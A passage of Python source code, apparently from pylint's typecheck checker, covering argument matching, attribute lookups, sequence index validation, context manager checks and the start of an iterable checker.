parameters = 0 if hasattr(callable_obj, "implicit_parameters"): parameters = callable_obj.implicit_parameters() if isinstance(callable_obj, astroid.BoundMethod): # Bound methods have an extra implicit 'self' argument. return callable_obj, parameters, callable_obj.type if isinstance(callable_obj, astroid.UnboundMethod): return callable_obj, parameters, "unbound method" if isinstance(callable_obj, nodes.FunctionDef): return callable_obj, parameters, callable_obj.type if isinstance(callable_obj, nodes.Lambda): return callable_obj, parameters, "lambda" if isinstance(callable_obj, nodes.ClassDef): # Class instantiation, lookup __new__ instead. # If we only find object.__new__, we can safely check __init__ # instead. If __new__ belongs to builtins, then we look # again for __init__ in the locals, since we won't have # argument information for the builtin __new__ function. try: # Use the last definition of __new__. new = callable_obj.local_attr("__new__")[-1] except astroid.NotFoundError: new = None from_object = new and new.parent.scope().name == "object" from_builtins = new and new.root().name in sys.builtin_module_names if not new or from_object or from_builtins: try: # Use the last definition of __init__. callable_obj = callable_obj.local_attr("__init__")[-1] except astroid.NotFoundError as e: # do nothing, covered by no-init. raise ValueError from e else: callable_obj = new if not isinstance(callable_obj, nodes.FunctionDef): raise ValueError # both have an extra implicit 'cls'/'self' argument. 
return callable_obj, parameters, "constructor" raise ValueError def _has_parent_of_type(node, node_type, statement): """Check if the given node has a parent of the given type.""" parent = node.parent while not isinstance(parent, node_type) and statement.parent_of(parent): parent = parent.parent return isinstance(parent, node_type) def _no_context_variadic_keywords(node, scope): statement = node.statement() variadics = () if isinstance(scope, nodes.Lambda) and not isinstance(scope, nodes.FunctionDef): variadics = list(node.keywords or []) + node.kwargs elif isinstance(statement, (nodes.Return, nodes.Expr, nodes.Assign)) and isinstance( statement.value, nodes.Call ): call = statement.value variadics = list(call.keywords or []) + call.kwargs return _no_context_variadic(node, scope.args.kwarg, nodes.Keyword, variadics) def _no_context_variadic_positional(node, scope): variadics = () if isinstance(scope, nodes.Lambda) and not isinstance(scope, nodes.FunctionDef): variadics = node.starargs + node.kwargs else: statement = node.statement() if isinstance( statement, (nodes.Expr, nodes.Return, nodes.Assign) ) and isinstance(statement.value, nodes.Call): call = statement.value variadics = call.starargs + call.kwargs return _no_context_variadic(node, scope.args.vararg, nodes.Starred, variadics) def _no_context_variadic(node, variadic_name, variadic_type, variadics): """Verify if the given call node has variadic nodes without context This is a workaround for handling cases of nested call functions which don't have the specific call context at hand. Variadic arguments (variable positional arguments and variable keyword arguments) are inferred, inherently wrong, by astroid as a Tuple, respectively a Dict with empty elements. This can lead pylint to believe that a function call receives too few arguments. 
""" scope = node.scope() is_in_lambda_scope = not isinstance(scope, nodes.FunctionDef) and isinstance( scope, nodes.Lambda ) statement = node.statement() for name in statement.nodes_of_class(nodes.Name): if name.name != variadic_name: continue inferred = safe_infer(name) if isinstance(inferred, (nodes.List, nodes.Tuple)): length = len(inferred.elts) elif isinstance(inferred, nodes.Dict): length = len(inferred.items) else: continue if is_in_lambda_scope and isinstance(inferred.parent, nodes.Arguments): # The statement of the variadic will be the assignment itself, # so we need to go the lambda instead inferred_statement = inferred.parent.parent else: inferred_statement = inferred.statement() if not length and isinstance(inferred_statement, nodes.Lambda): is_in_starred_context = _has_parent_of_type(node, variadic_type, statement) used_as_starred_argument = any( variadic.value == name or variadic.value.parent_of(name) for variadic in variadics ) if is_in_starred_context or used_as_starred_argument: return True return False def _is_invalid_metaclass(metaclass): try: mro = metaclass.mro() except NotImplementedError: # Cannot have a metaclass which is not a newstyle class. return True else: if not any(is_builtin_object(cls) and cls.name == "type" for cls in mro): return True return False def _infer_from_metaclass_constructor(cls, func: nodes.FunctionDef): """Try to infer what the given *func* constructor is building :param astroid.FunctionDef func: A metaclass constructor. Metaclass definitions can be functions, which should accept three arguments, the name of the class, the bases of the class and the attributes. The function could return anything, but usually it should be a proper metaclass. :param astroid.ClassDef cls: The class for which the *func* parameter should generate a metaclass. :returns: The class generated by the function or None, if we couldn't infer it. 
:rtype: astroid.ClassDef """ context = astroid.context.InferenceContext() class_bases = nodes.List() class_bases.postinit(elts=cls.bases) attrs = nodes.Dict() local_names = [(name, values[-1]) for name, values in cls.locals.items()] attrs.postinit(local_names) builder_args = nodes.Tuple() builder_args.postinit([cls.name, class_bases, attrs]) context.callcontext = astroid.context.CallContext(builder_args) try: inferred = next(func.infer_call_result(func, context), None) except astroid.InferenceError: return None return inferred or None def _is_c_extension(module_node): return ( not astroid.modutils.is_standard_module(module_node.name) and not module_node.fully_defined() ) def _is_invalid_isinstance_type(arg): # Return True if we are sure that arg is not a type inferred = utils.safe_infer(arg) if not inferred: # Cannot infer it so skip it. return False if isinstance(inferred, nodes.Tuple): return any(_is_invalid_isinstance_type(elt) for elt in inferred.elts) if isinstance(inferred, nodes.ClassDef): return False if isinstance(inferred, astroid.Instance) and inferred.qname() == BUILTIN_TUPLE: return False return True class TypeChecker(BaseChecker): """try to find bugs in the code using type inference""" __implements__ = (IAstroidChecker,) # configuration section name name = "typecheck" # messages msgs = MSGS priority = -1 # configuration options options = ( ( "ignore-on-opaque-inference", { "default": True, "type": "yn", "metavar": "<y_or_n>", "help": "This flag controls whether pylint should warn about " "no-member and similar checks whenever an opaque object " "is returned when inferring. The inference can return " "multiple potential results while evaluating a Python object, " "but some branches might not be evaluated, which results in " "partial inference. 
In that case, it might be useful to still emit " "no-member and other checks for the rest of the inferred objects.", }, ), ( "ignore-mixin-members", { "default": True, "type": "yn", "metavar": "<y_or_n>", "help": 'Tells whether missing members accessed in mixin \ class should be ignored. A mixin class is detected if its name ends with \ "mixin" (case insensitive).', }, ), ( "ignore-none", { "default": True, "type": "yn", "metavar": "<y_or_n>", "help": "Tells whether to warn about missing members when the owner " "of the attribute is inferred to be None.", }, ), ( "ignored-modules", { "default": (), "type": "csv", "metavar": "<module names>", "help": "List of module names for which member attributes " "should not be checked (useful for modules/projects " "where namespaces are manipulated during runtime and " "thus existing member attributes cannot be " "deduced by static analysis). It supports qualified " "module names, as well as Unix pattern matching.", }, ), # the defaults here are *stdlib* names that (almost) always # lead to false positives, since their idiomatic use is # 'too dynamic' for pylint to grok. ( "ignored-classes", { "default": ("optparse.Values", "thread._local", "_thread._local"), "type": "csv", "metavar": "<members names>", "help": "List of class names for which member attributes " "should not be checked (useful for classes with " "dynamically set attributes). This supports " "the use of qualified names.", }, ), ( "generated-members", { "default": (), "type": "string", "metavar": "<members names>", "help": "List of members which are set dynamically and \ missed by pylint inference system, and so shouldn't trigger E1101 when \ accessed. Python regular expressions are accepted.", }, ), ( "contextmanager-decorators", { "default": ["contextlib.contextmanager"], "type": "csv", "metavar": "<decorator names>", "help": "List of decorators that produce context managers, " "such as contextlib.contextmanager. 
Add to this list " "to register other decorators that produce valid " "context managers.", }, ), ( "missing-member-hint-distance", { "default": 1, "type": "int", "metavar": "<member hint edit distance>", "help": "The minimum edit distance a name should have in order " "to be considered a similar match for a missing member name.", }, ), ( "missing-member-max-choices", { "default": 1, "type": "int", "metavar": "<member hint max choices>", "help": "The total number of similar names that should be taken in " "consideration when showing a hint for a missing member.", }, ), ( "missing-member-hint", { "default": True, "type": "yn", "metavar": "<missing member hint>", "help": "Show a hint with possible names when a member name was not " "found. The aspect of finding the hint is based on edit distance.", }, ), ( "signature-mutators", { "default": [], "type": "csv", "metavar": "<decorator names>", "help": "List of decorators that change the signature of " "a decorated function.", }, ), ) @astroid.decorators.cachedproperty def _suggestion_mode(self): return get_global_option(self, "suggestion-mode", default=True) @astroid.decorators.cachedproperty def _compiled_generated_members(self) -> Tuple[Pattern, ...]: # do this lazily since config not fully initialized in __init__ # generated_members may contain regular expressions # (surrounded by quote `"` and followed by a comma `,`) # REQUEST,aq_parent,"[a-zA-Z]+_set{1,2}"' => # ('REQUEST', 'aq_parent', '[a-zA-Z]+_set{1,2}') generated_members = self.config.generated_members if isinstance(generated_members, str): gen = shlex.shlex(generated_members) gen.whitespace += "," gen.wordchars += r"[]-+\.*?()|" generated_members = tuple(tok.strip('"') for tok in gen) return tuple(re.compile(exp) for exp in generated_members) @check_messages("keyword-arg-before-vararg") def visit_functiondef(self, node): # check for keyword arg before varargs if node.args.vararg and node.args.defaults: self.add_message("keyword-arg-before-vararg", node=node, 
args=(node.name)) visit_asyncfunctiondef = visit_functiondef @check_messages("invalid-metaclass") def visit_classdef(self, node): def _metaclass_name(metaclass): if isinstance(metaclass, (nodes.ClassDef, nodes.FunctionDef)): return metaclass.name return metaclass.as_string() metaclass = node.declared_metaclass() if not metaclass: return if isinstance(metaclass, nodes.FunctionDef): # Try to infer the result. metaclass = _infer_from_metaclass_constructor(node, metaclass) if not metaclass: # Don't do anything if we cannot infer the result. return if isinstance(metaclass, nodes.ClassDef): if _is_invalid_metaclass(metaclass): self.add_message( "invalid-metaclass", node=node, args=(_metaclass_name(metaclass),) ) else: self.add_message( "invalid-metaclass", node=node, args=(_metaclass_name(metaclass),) ) def visit_assignattr(self, node): if isinstance(node.assign_type(), nodes.AugAssign): self.visit_attribute(node) def visit_delattr(self, node): self.visit_attribute(node) @check_messages("no-member", "c-extension-no-member") def visit_attribute(self, node): """check that the accessed attribute exists to avoid too much false positives for now, we'll consider the code as correct if a single of the inferred nodes has the accessed attribute. function/method, super call and metaclasses are ignored """ if any( pattern.match(name) for name in (node.attrname, node.as_string()) for pattern in self._compiled_generated_members ): return try: inferred = list(node.expr.infer()) except astroid.InferenceError: return # list of (node, nodename) which are missing the attribute missingattr = set() non_opaque_inference_results = [ owner for owner in inferred if owner is not astroid.Uninferable and not isinstance(owner, nodes.Unknown) ] if ( len(non_opaque_inference_results) != len(inferred) and self.config.ignore_on_opaque_inference ): # There is an ambiguity in the inference. 
Since we can't # make sure that we won't emit a false positive, we just stop # whenever the inference returns an opaque inference object. return for owner in non_opaque_inference_results: name = getattr(owner, "name", None) if _is_owner_ignored( owner, name, self.config.ignored_classes, self.config.ignored_modules ): continue qualname = f"{owner.pytype()}.{node.attrname}" if any( pattern.match(qualname) for pattern in self._compiled_generated_members ): return try: if not [ n for n in owner.getattr(node.attrname) if not isinstance(n.statement(), nodes.AugAssign) ]: missingattr.add((owner, name)) continue except AttributeError: continue except astroid.DuplicateBasesError: continue except astroid.NotFoundError: # This can't be moved before the actual .getattr call, # because there can be more values inferred and we are # stopping after the first one which has the attribute in question. # The problem is that if the first one has the attribute, # but we continue to the next values which doesn't have the # attribute, then we'll have a false positive. # So call this only after the call has been made. 
if not _emit_no_member( node, owner, name, ignored_mixins=self.config.ignore_mixin_members, ignored_none=self.config.ignore_none, ): continue missingattr.add((owner, name)) continue # stop on the first found break else: # we have not found any node with the attributes, display the # message for inferred nodes done = set() for owner, name in missingattr: if isinstance(owner, astroid.Instance): actual = owner._proxied else: actual = owner if actual in done: continue done.add(actual) msg, hint = self._get_nomember_msgid_hint(node, owner) self.add_message( msg, node=node, args=(owner.display_type(), name, node.attrname, hint), confidence=INFERENCE, ) def _get_nomember_msgid_hint(self, node, owner): suggestions_are_possible = self._suggestion_mode and isinstance( owner, nodes.Module ) if suggestions_are_possible and _is_c_extension(owner): msg = "c-extension-no-member" hint = "" else: msg = "no-member" if self.config.missing_member_hint: hint = _missing_member_hint( owner, node.attrname, self.config.missing_member_hint_distance, self.config.missing_member_max_choices, ) else: hint = "" return msg, hint @check_messages( "assignment-from-no-return", "assignment-from-none", "non-str-assignment-to-dunder-name", ) def visit_assign(self, node): """ Process assignments in the AST. 
""" self._check_assignment_from_function_call(node) self._check_dundername_is_string(node) def _check_assignment_from_function_call(self, node): """check that if assigning to a function call, the function is possibly returning something valuable """ if not isinstance(node.value, nodes.Call): return function_node = safe_infer(node.value.func) funcs = (nodes.FunctionDef, astroid.UnboundMethod, astroid.BoundMethod) if not isinstance(function_node, funcs): return # Unwrap to get the actual function object if isinstance(function_node, astroid.BoundMethod) and isinstance( function_node._proxied, astroid.UnboundMethod ): function_node = function_node._proxied._proxied # Make sure that it's a valid function that we can analyze. # Ordered from less expensive to more expensive checks. # pylint: disable=too-many-boolean-expressions if ( not function_node.is_function or isinstance(function_node, nodes.AsyncFunctionDef) or function_node.decorators or function_node.is_generator() or function_node.is_abstract(pass_is_abstract=False) or utils.is_error(function_node) or not function_node.root().fully_defined() ): return returns = list( function_node.nodes_of_class(nodes.Return, skip_klass=nodes.FunctionDef) ) if not returns: self.add_message("assignment-from-no-return", node=node) else: for rnode in returns: if not ( isinstance(rnode.value, nodes.Const) and rnode.value.value is None or rnode.value is None ): break else: self.add_message("assignment-from-none", node=node) def _check_dundername_is_string(self, node): """ Check a string is assigned to self.__name__ """ # Check the left hand side of the assignment is <something>.__name__ lhs = node.targets[0] if not isinstance(lhs, nodes.AssignAttr): return if not lhs.attrname == "__name__": return # If the right hand side is not a string rhs = node.value if isinstance(rhs, nodes.Const) and isinstance(rhs.value, str): return inferred = utils.safe_infer(rhs) if not inferred: return if not (isinstance(inferred, nodes.Const) and 
isinstance(inferred.value, str)): # Add the message self.add_message("non-str-assignment-to-dunder-name", node=node) def _check_uninferable_call(self, node): """ Check that the given uninferable Call node does not call an actual function. """ if not isinstance(node.func, nodes.Attribute): return # Look for properties. First, obtain # the lhs of the Attribute node and search the attribute # there. If that attribute is a property or a subclass of properties, # then most likely it's not callable. expr = node.func.expr klass = safe_infer(expr) if ( klass is None or klass is astroid.Uninferable or not isinstance(klass, astroid.Instance) ): return try: attrs = klass._proxied.getattr(node.func.attrname) except astroid.NotFoundError: return for attr in attrs: if attr is astroid.Uninferable: continue if not isinstance(attr, nodes.FunctionDef): continue # Decorated, see if it is decorated with a property. # Also, check the returns and see if they are callable. if decorated_with_property(attr): try: all_returns_are_callable = all( return_node.callable() or return_node is astroid.Uninferable for return_node in attr.infer_call_result(node) ) except astroid.InferenceError: continue if not all_returns_are_callable: self.add_message( "not-callable", node=node, args=node.func.as_string() ) break def _check_argument_order(self, node, call_site, called, called_param_names): """Match the supplied argument names against the function parameters. Warn if some argument names are not in the same order as they are in the function signature. 
""" # Check for called function being an object instance function # If so, ignore the initial 'self' argument in the signature try: is_classdef = isinstance(called.parent, nodes.ClassDef) if is_classdef and called_param_names[0] == "self": called_param_names = called_param_names[1:] except IndexError: return try: # extract argument names, if they have names calling_parg_names = [p.name for p in call_site.positional_arguments] # Additionally get names of keyword arguments to use in a full match # against parameters calling_kwarg_names = [ arg.name for arg in call_site.keyword_arguments.values() ] except AttributeError: # the type of arg does not provide a `.name`. In this case we # stop checking for out-of-order arguments because it is only relevant # for named variables. return # Don't check for ordering if there is an unmatched arg or param arg_set = set(calling_parg_names) | set(calling_kwarg_names) param_set = set(called_param_names) if arg_set != param_set: return # Warn based on the equality of argument ordering if calling_parg_names != called_param_names[: len(calling_parg_names)]: self.add_message("arguments-out-of-order", node=node, args=()) def _check_isinstance_args(self, node): if len(node.args) != 2: # isinstance called with wrong number of args return second_arg = node.args[1] if _is_invalid_isinstance_type(second_arg): self.add_message("isinstance-second-argument-not-valid-type", node=node) # pylint: disable=too-many-branches,too-many-locals @check_messages(*(list(MSGS.keys()))) def visit_call(self, node): """check that called functions/methods are inferred to callable objects, and that the arguments passed to the function match the parameters in the inferred function's definition """ called = safe_infer(node.func) # only function, generator and object defining __call__ are allowed # Ignore instances of descriptors since astroid cannot properly handle them # yet if called and not called.callable(): if isinstance(called, astroid.Instance) and ( not 
has_known_bases(called) or ( called.parent is not None and isinstance(called.scope(), nodes.ClassDef) and "__get__" in called.locals ) ): # Don't emit if we can't make sure this object is callable. pass else: self.add_message("not-callable", node=node, args=node.func.as_string()) self._check_uninferable_call(node) try: called, implicit_args, callable_name = _determine_callable(called) except ValueError: # Any error occurred during determining the function type, most of # those errors are handled by different warnings. return if called.args.args is None: if called.name == "isinstance": # Verify whether second argument of isinstance is a valid type self._check_isinstance_args(node) # Built-in functions have no argument information. return if len(called.argnames()) != len(set(called.argnames())): # Duplicate parameter name (see duplicate-argument). We can't really # make sense of the function call in this case, so just return. return # Build the set of keyword arguments, checking for duplicate keywords, # and count the positional arguments. call_site = astroid.arguments.CallSite.from_call(node) # Warn about duplicated keyword arguments, such as `f=24, **{'f': 24}` for keyword in call_site.duplicated_keywords: self.add_message("repeated-keyword", node=node, args=(keyword,)) if call_site.has_invalid_arguments() or call_site.has_invalid_keywords(): # Can't make sense of this. return # Has the function signature changed in ways we cannot reliably detect? if hasattr(called, "decorators") and decorated_with( called, self.config.signature_mutators ): return num_positional_args = len(call_site.positional_arguments) keyword_args = list(call_site.keyword_arguments.keys()) overload_function = is_overload_stub(called) # Determine if we don't have a context for our call and we use variadics. 
node_scope = node.scope() if isinstance(node_scope, (nodes.Lambda, nodes.FunctionDef)): has_no_context_positional_variadic = _no_context_variadic_positional( node, node_scope ) has_no_context_keywords_variadic = _no_context_variadic_keywords( node, node_scope ) else: has_no_context_positional_variadic = ( has_no_context_keywords_variadic ) = False # These are coming from the functools.partial implementation in astroid already_filled_positionals = getattr(called, "filled_positionals", 0) already_filled_keywords = getattr(called, "filled_keywords", {}) keyword_args += list(already_filled_keywords) num_positional_args += implicit_args + already_filled_positionals # Analyze the list of formal parameters. args = list(itertools.chain(called.args.posonlyargs or (), called.args.args)) num_mandatory_parameters = len(args) - len(called.args.defaults) parameters = [] parameter_name_to_index = {} for i, arg in enumerate(args): if isinstance(arg, nodes.Tuple): name = None # Don't store any parameter names within the tuple, since those # are not assignable from keyword arguments. else: assert isinstance(arg, nodes.AssignName) # This occurs with: # def f( (a), (b) ): pass name = arg.name parameter_name_to_index[name] = i if i >= num_mandatory_parameters: defval = called.args.defaults[i - num_mandatory_parameters] else: defval = None parameters.append([(name, defval), False]) kwparams = {} for i, arg in enumerate(called.args.kwonlyargs): if isinstance(arg, nodes.Keyword): name = arg.arg else: assert isinstance(arg, nodes.AssignName) name = arg.name kwparams[name] = [called.args.kw_defaults[i], False] self._check_argument_order( node, call_site, called, [p[0][0] for p in parameters] ) # 1. Match the positional arguments. for i in range(num_positional_args): if i < len(parameters): parameters[i][1] = True elif called.args.vararg is not None: # The remaining positional arguments get assigned to the *args # parameter. break elif not overload_function: # Too many positional arguments. 
self.add_message( "too-many-function-args", node=node, args=(callable_name,) ) break # 2. Match the keyword arguments. for keyword in keyword_args: if keyword in parameter_name_to_index: i = parameter_name_to_index[keyword] if parameters[i][1]: # Duplicate definition of function parameter. # Might be too hardcoded, but this can actually # happen when using str.format and `self` is passed # by keyword argument, as in `.format(self=self)`. # It's perfectly valid to so, so we're just skipping # it if that's the case. if not (keyword == "self" and called.qname() in STR_FORMAT): self.add_message( "redundant-keyword-arg", node=node, args=(keyword, callable_name), ) else: parameters[i][1] = True elif keyword in kwparams: if kwparams[keyword][1]: # Duplicate definition of function parameter. self.add_message( "redundant-keyword-arg", node=node, args=(keyword, callable_name), ) else: kwparams[keyword][1] = True elif called.args.kwarg is not None: # The keyword argument gets assigned to the **kwargs parameter. pass elif not overload_function: # Unexpected keyword argument. self.add_message( "unexpected-keyword-arg", node=node, args=(keyword, callable_name) ) # 3. Match the **kwargs, if any. if node.kwargs: for i, [(name, defval), assigned] in enumerate(parameters): # Assume that *kwargs provides values for all remaining # unassigned named parameters. if name is not None: parameters[i][1] = True else: # **kwargs can't assign to tuples. pass # Check that any parameters without a default have been assigned # values. 
for [(name, defval), assigned] in parameters: if (defval is None) and not assigned: if name is None: display_name = "<tuple>" else: display_name = repr(name) if not has_no_context_positional_variadic and not overload_function: self.add_message( "no-value-for-parameter", node=node, args=(display_name, callable_name), ) for name, val in kwparams.items(): defval, assigned = val if ( defval is None and not assigned and not has_no_context_keywords_variadic and not overload_function ): self.add_message("missing-kwoa", node=node, args=(name, callable_name)) def _check_invalid_sequence_index(self, subscript: nodes.Subscript): # Look for index operations where the parent is a sequence type. # If the types can be determined, only allow indices to be int, # slice or instances with __index__. parent_type = safe_infer(subscript.value) if not isinstance( parent_type, (nodes.ClassDef, astroid.Instance) ) or not has_known_bases(parent_type): return None # Determine what method on the parent this index will use # The parent of this node will be a Subscript, and the parent of that # node determines if the Subscript is a get, set, or delete operation. if subscript.ctx is astroid.Store: methodname = "__setitem__" elif subscript.ctx is astroid.Del: methodname = "__delitem__" else: methodname = "__getitem__" # Check if this instance's __getitem__, __setitem__, or __delitem__, as # appropriate to the statement, is implemented in a builtin sequence # type. This way we catch subclasses of sequence types but skip classes # that override __getitem__ and which may allow non-integer indices. 
try: methods = astroid.interpreter.dunder_lookup.lookup(parent_type, methodname) if methods is astroid.Uninferable: return None itemmethod = methods[0] except ( astroid.AttributeInferenceError, IndexError, ): return None if ( not isinstance(itemmethod, nodes.FunctionDef) or itemmethod.root().name != BUILTINS or not itemmethod.parent or itemmethod.parent.name not in SEQUENCE_TYPES ): return None # For ExtSlice objects coming from visit_extslice, no further # inference is necessary, since if we got this far the ExtSlice # is an error. if isinstance(subscript.value, nodes.ExtSlice): index_type = subscript.value else: index_type = safe_infer(subscript.slice) if index_type is None or index_type is astroid.Uninferable: return None # Constants must be of type int if isinstance(index_type, nodes.Const): if isinstance(index_type.value, int): return None # Instance values must be int, slice, or have an __index__ method elif isinstance(index_type, astroid.Instance): if index_type.pytype() in (BUILTINS + ".int", BUILTINS + ".slice"): return None try: index_type.getattr("__index__") return None except astroid.NotFoundError: pass elif isinstance(index_type, nodes.Slice): # A slice can be present # here after inferring the index node, which could # be a `slice(...)` call for instance. 
return self._check_invalid_slice_index(index_type) # Anything else is an error self.add_message("invalid-sequence-index", node=subscript) return None @check_messages("invalid-sequence-index") def visit_extslice(self, node): if not node.parent or not hasattr(node.parent, "value"): return None # Check extended slice objects as if they were used as a sequence # index to check if the object being sliced can support them return self._check_invalid_sequence_index(node.parent) def _check_invalid_slice_index(self, node): # Check the type of each part of the slice invalid_slices = 0 for index in (node.lower, node.upper, node.step): if index is None: continue index_type = safe_infer(index) if index_type is None or index_type is astroid.Uninferable: continue # Constants must of type int or None if isinstance(index_type, nodes.Const): if isinstance(index_type.value, (int, type(None))): continue # Instance values must be of type int, None or an object # with __index__ elif isinstance(index_type, astroid.Instance): if index_type.pytype() in (BUILTINS + ".int", BUILTINS + ".NoneType"): continue try: index_type.getattr("__index__") return except astroid.NotFoundError: pass invalid_slices += 1 if not invalid_slices: return # Anything else is an error, unless the object that is indexed # is a custom object, which knows how to handle this kind of slices parent = node.parent if isinstance(parent, nodes.ExtSlice): parent = parent.parent if isinstance(parent, nodes.Subscript): inferred = safe_infer(parent.value) if inferred is None or inferred is astroid.Uninferable: # Don't know what this is return known_objects = ( nodes.List, nodes.Dict, nodes.Tuple, astroid.objects.FrozenSet, nodes.Set, ) if not isinstance(inferred, known_objects): # Might be an instance that knows how to handle this slice object return for _ in range(invalid_slices): self.add_message("invalid-slice-index", node=node) @check_messages("not-context-manager") def visit_with(self, node): for ctx_mgr, _ in node.items: 
context = astroid.context.InferenceContext() inferred = safe_infer(ctx_mgr, context=context) if inferred is None or inferred is astroid.Uninferable: continue if isinstance(inferred, astroid.bases.Generator): # Check if we are dealing with a function decorated # with contextlib.contextmanager. if decorated_with( inferred.parent, self.config.contextmanager_decorators ): continue # If the parent of the generator is not the context manager itself, # that means that it could have been returned from another # function which was the real context manager. # The following approach is more of a hack rather than a real # solution: walk all the inferred statements for the # given *ctx_mgr* and if you find one function scope # which is decorated, consider it to be the real # manager and give up, otherwise emit not-context-manager. # See the test file for not_context_manager for a couple # of self explaining tests. # Retrieve node from all previusly visited nodes in the the inference history context_path_names = filter(None, _unflatten(context.path)) inferred_paths = _flatten_container( safe_infer(path) for path in context_path_names ) for inferred_path in inferred_paths: if not inferred_path: continue scope = inferred_path.scope() if not isinstance(scope, nodes.FunctionDef): continue if decorated_with(scope, self.config.contextmanager_decorators): break else: self.add_message( "not-context-manager", node=node, args=(inferred.name,) ) else: try: inferred.getattr("__enter__") inferred.getattr("__exit__") except astroid.NotFoundError: if isinstance(inferred, astroid.Instance): # If we do not know the bases of this class, # just skip it. if not has_known_bases(inferred): continue # Just ignore mixin classes. 
if self.config.ignore_mixin_members: if inferred.name[-5:].lower() == "mixin": continue self.add_message( "not-context-manager", node=node, args=(inferred.name,) ) @check_messages("invalid-unary-operand-type") def visit_unaryop(self, node): """Detect TypeErrors for unary operands.""" for error in node.type_errors(): # Let the error customize its output. self.add_message("invalid-unary-operand-type", args=str(error), node=node) @check_messages("unsupported-binary-operation") def visit_binop(self, node: nodes.BinOp): if node.op == "|": self._detect_unsupported_alternative_union_syntax(node) def _detect_unsupported_alternative_union_syntax(self, node: nodes.BinOp) -> None: """Detect if unsupported alternative Union syntax (PEP 604) was used.""" if PY310_PLUS: # 310+ supports the new syntax return if isinstance( node.parent, TYPE_ANNOTATION_NODES_TYPES ) and not is_postponed_evaluation_enabled(node): # Use in type annotations only allowed if # postponed evaluation is enabled. self._check_unsupported_alternative_union_syntax(node) if isinstance( node.parent, ( nodes.Assign, nodes.Call, nodes.Keyword, nodes.Dict, nodes.Tuple, nodes.Set, nodes.List, nodes.BinOp, ), ): # Check other contexts the syntax might appear, but are invalid. # Make sure to filter context if postponed evaluation is enabled # and parent is allowed node type. 
allowed_nested_syntax = False if is_postponed_evaluation_enabled(node): parent_node = node.parent while True: if isinstance(parent_node, TYPE_ANNOTATION_NODES_TYPES): allowed_nested_syntax = True break parent_node = parent_node.parent if isinstance(parent_node, nodes.Module): break if not allowed_nested_syntax: self._check_unsupported_alternative_union_syntax(node) def _check_unsupported_alternative_union_syntax(self, node: nodes.BinOp) -> None: """Check if left or right node is of type `type`.""" msg = "unsupported operand type(s) for |" for n in (node.left, node.right): n = astroid.helpers.object_type(n) if isinstance(n, nodes.ClassDef) and is_classdef_type(n): self.add_message("unsupported-binary-operation", args=msg, node=node) break @check_messages("unsupported-binary-operation") def _visit_binop(self, node): """Detect TypeErrors for binary arithmetic operands.""" self._check_binop_errors(node) @check_messages("unsupported-binary-operation") def _visit_augassign(self, node): """Detect TypeErrors for augmented binary arithmetic operands.""" self._check_binop_errors(node) def _check_binop_errors(self, node): for error in node.type_errors(): # Let the error customize its output. 
if any( isinstance(obj, nodes.ClassDef) and not has_known_bases(obj) for obj in (error.left_type, error.right_type) ): continue self.add_message("unsupported-binary-operation", args=str(error), node=node) def _check_membership_test(self, node): if is_inside_abstract_class(node): return if is_comprehension(node): return inferred = safe_infer(node) if inferred is None or inferred is astroid.Uninferable: return if not supports_membership_test(inferred): self.add_message( "unsupported-membership-test", args=node.as_string(), node=node ) @check_messages("unsupported-membership-test") def visit_compare(self, node): if len(node.ops) != 1: return op, right = node.ops[0] if op in ["in", "not in"]: self._check_membership_test(right) @check_messages( "unsubscriptable-object", "unsupported-assignment-operation", "unsupported-delete-operation", "unhashable-dict-key", "invalid-sequence-index", "invalid-slice-index", ) def visit_subscript(self, node): self._check_invalid_sequence_index(node) supported_protocol = None if isinstance(node.value, (nodes.ListComp, nodes.DictComp)): return if isinstance(node.value, nodes.Dict): # Assert dict key is hashable inferred = safe_infer(node.slice) if inferred not in (None, astroid.Uninferable): try: hash_fn = next(inferred.igetattr("__hash__")) except astroid.InferenceError: pass else: if getattr(hash_fn, "value", True) is None: self.add_message("unhashable-dict-key", node=node.value) if node.ctx == astroid.Load: supported_protocol = supports_getitem msg = "unsubscriptable-object" elif node.ctx == astroid.Store: supported_protocol = supports_setitem msg = "unsupported-assignment-operation" elif node.ctx == astroid.Del: supported_protocol = supports_delitem msg = "unsupported-delete-operation" if isinstance(node.value, nodes.SetComp): self.add_message(msg, args=node.value.as_string(), node=node.value) return if is_inside_abstract_class(node): return inferred = safe_infer(node.value) if inferred is None or inferred is astroid.Uninferable: 
return if getattr(inferred, "decorators", None): first_decorator = astroid.helpers.safe_infer(inferred.decorators.nodes[0]) if isinstance(first_decorator, nodes.ClassDef): inferred = first_decorator.instantiate_class() else: return # It would be better to handle function # decorators, but let's start slow. if not supported_protocol(inferred, node): self.add_message(msg, args=node.value.as_string(), node=node.value) @check_messages("dict-items-missing-iter") def visit_for(self, node): if not isinstance(node.target, nodes.Tuple): # target is not a tuple return if not len(node.target.elts) == 2: # target is not a tuple of two elements return iterable = node.iter if not isinstance(iterable, nodes.Name): # it's not a bare variable return inferred = safe_infer(iterable) if not inferred: return if not isinstance(inferred, nodes.Dict): # the iterable is not a dict return self.add_message("dict-iter-missing-items", node=node) class IterableChecker(BaseChecker): """ Checks for non-iterables used in an iterable context. Contexts include: - for-statement - starargs in function call - `yield from`-statement - list, dict and set comprehensions - generator expressions Also checks for non-mappings in function call kwargs. 
""" __implements__ = (IAstroidChecker,) name = "typecheck" msgs = { "E1133": ( "Non-iterable value %s is used in an iterating context", "not-an-iterable", "Used when a non-iterable value is used in place where " "iterable is expected", ), "E1134": ( "Non-mapping value %s is used in a mapping context", "not-a-mapping", "Used when a non-mapping value is used in place where " "mapping is expected", ), } @staticmethod def _is_asyncio_coroutine(node): if not isinstance(node, nodes.Call): return False inferred_func = safe_infer(node.func) if not isinstance(inferred_func, nodes.FunctionDef): return False if not inferred_func.decorators: return False for decorator in inferred_func.decorators.nodes: inferred_decorator = safe_infer(decorator) if not isinstance(inferred_decorator, nodes.FunctionDef): continue if inferred_decorator.qname() != ASYNCIO_COROUTINE: continue return True return False def _check_iterable(self, node, check_async=False): if is_inside_abstract_class(node) or is_comprehension(node): return inferred = safe_infer(node) if not inferred: return if not is_iterable(inferred, check_async=check_async): self.add_message("not-an-iterable", args=node.as_string(), node=node) def _check_mapping(self, node): if is_inside_abstract_class(node): return if isinstance(node, nodes.DictComp): return inferred = safe_infer(node) if inferred is None or inferred is astroid.Uninferable: return if not is_mapping(inferred): self.add_message("not-a-mapping", args=node.as_string(), node=node) @check_messages("not-an-iterable") def visit_for(self, node): self._check_iterable(node.iter) @check_messages("not-an-iterable") def visit_asyncfor(self, node): self._check_iterable(node.iter, check_async=True) @check_messages("not-an-iterable") def visit_yieldfrom(self, node): if self._is_asyncio_coroutine(node.value): return 